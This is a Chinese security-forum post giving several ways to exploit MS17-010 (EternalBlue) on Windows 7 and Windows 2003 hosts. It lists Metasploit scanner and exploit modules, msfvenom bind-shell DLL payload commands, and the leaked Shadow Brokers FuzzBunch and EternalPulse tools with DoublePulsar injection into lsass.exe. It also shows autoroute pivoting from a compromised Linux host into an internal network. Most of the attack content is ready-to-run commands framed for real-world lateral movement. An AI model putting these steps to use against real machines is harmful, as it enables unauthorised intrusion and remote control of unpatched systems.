电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 781 人浏览分享

ms17_010的几种打法

[复制链接]
781 0
MS17_010常用打法:

前言:

ms17_010是内网的必争之地,很多时候需要借助此漏洞来进行横向,由于多次遇到该漏洞时msf无法利用
成功就通过查阅资料来复现ms17_010的几种打法并在实战中成功。

环境:

win7 x64:192.168.2.149

win7 x86:192.168.2.136

windows2003:192.168.2.152

kali:192.168.2.131

msf打法:

x64:

探测漏洞:

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.2.149

QQ截图20221205141912.png

利用:

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.2.149
run

QQ截图20221205142545.png

x86:

插件安装参考:利用MS17-010渗透win7(32位) - 等待の喵 - 博客园 (cnblogs.com)

探测漏洞:

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.2.136

3326.png

可以看到系统为32位

利用:

use exploit/windows/smb/eternalblue_doublepulsar
show target
set payload windows/meterpreter/bind_tcp
set processinject explorer.exe
set rhost 192.168.2.136
run

3325.png

3321.png

命令执行模块:
遇到windows2003时可以选择该模块进行命令执行

use auxiliary/admin/smb/ms17_010_command
set command whoami
set rhost 192.168.2.152
run

3320.png

python脚本打法(原生打法):

实战打法:

我们拿到一台liunx主机权限,将liunx主机上线到msf再来利用python脚本打ms17_010

添加路由:

run autoroute -s 172.17.100.12/16

run autoroute -p

3319.png

内网中172.17.26.246存在ms17_010:

漏洞利用:

脚本地址:https://github.com/misterch0c/shadowbroker

通过代理将流量代理到本地:

3318.png

探测漏洞利用模块:

python fb.py

3316.png

TargetIP写目标IP 172.17.26.246,CallBack随便写:不使用Redirection

使用smbtouch探测

use smbtouch

execute

200.png

199.png

可以看出目标存在漏洞且 ETERNALBLUE模块可以利用:

use  ETERNALBLUE

198.png

这里选择1:

196.png

189.png

可以看出攻击成功且目标系统为64位:

msf生成payload:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=1124 -f dll -o 64.dll

use Doublepulsar

188.png

186.png

这一步选择2,然后写上dll的地址:

185.png

msf收到会话,成功攻击成功:

183.png

里面集成了32位和64位,可根据自身情况来选择。

为什么选择python脚本:

其实在实际运用中,msf的成功率很低,这就是为什么选择它的原因。

python脚本的exe打法:

这个和上面的那个其实差不多,这个更方便一点:

脚本地址:https://github.com/TolgaSEZER/EternalPulse

Eternalblue-2.2.0.exe --InConfig Eternalblue-2.2.0.xml --TargetIp 目标IP --TargetPort 445

Eternalblue-2.2.0.exe --InConfig Eternalblue-2.2.0.xml --TargetIp 172.17.26.246 --TargetPort 445

182.png

探测出目标系统64位

msf生成payload:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=1001 -f dll -o 64.dll

运行后门:

Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp 目标ip --TargetPort 445 --Pro
tocol SMB --Architecture x64 --Function RunDLL --DllPayload dll地址 --payloadDllOrdinal 1 --Proc
essName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60

181.png

成功收到会话:

180.png

该脚本也是64位和32位集成,可自行选择。

关于蓝屏:

上面两个脚本在本地均多次进行测试,用起来挺稳定的,没有出现蓝屏情况,可自行复现测试。

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.